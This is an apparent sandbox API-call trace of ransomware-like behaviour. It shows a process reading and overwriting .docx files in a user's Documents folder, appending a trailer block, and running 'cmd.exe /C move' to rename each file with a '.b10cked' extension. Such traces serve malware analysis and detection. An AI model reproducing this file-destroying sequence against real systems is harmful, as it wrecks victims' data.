SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1fbd [0134.950] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x24a5 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x24a5 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.952] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1251, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.952] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1251, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=-4689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1254 [0134.952] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1251, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=-4689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1254 [0134.952] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1251, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1251, lpOverlapped=0x0) returned 1 [0134.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8rVd3erYRX.docx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8rVd3erYRX.docx", cchWideChar=15, lpMultiByteStr=0x131326c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8rVd3erYRX.docx", lpUsedDefaultChar=0x0) returned 15 [0134.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x24a5 [0134.957] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.958] CloseHandle (hObject=0x114) returned 1 [0134.958] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\8rVd3erYRX.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC") returned 0x26 [0134.959] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.959] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc1c, dwThreadId=0xc28)) returned 1 [0134.964] CloseHandle (hObject=0x110) returned 1 [0134.964] CloseHandle (hObject=0x114) returned 1 [0134.964] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.964] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.964] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\documents\\d2pozddedi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19175359375) returned 1 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12faa [0134.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13492 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13492 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.967] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a48, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a48, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39496, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a4a [0134.968] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a48, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39496, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a4a [0134.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a48, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a48, lpOverlapped=0x0) returned 1 [0134.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2poZdDEdi.docx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2poZdDEdi.docx", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D2poZdDEdi.docx", lpUsedDefaultChar=0x0) returned 15 [0134.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13492 [0134.972] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.972] CloseHandle (hObject=0x114) returned 1 [0134.973] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\D2poZdDEdi.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC") returned 0x26 [0134.974] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.974] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbd0, dwThreadId=0xbcc)) returned 1 [0135.043] CloseHandle (hObject=0x110) returned 1 [0135.043] CloseHandle (hObject=0x114) returned 1 [0135.043] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.043] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.043] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\documents\\ern4jqprpgzde9n.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19183298039) returned 1 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 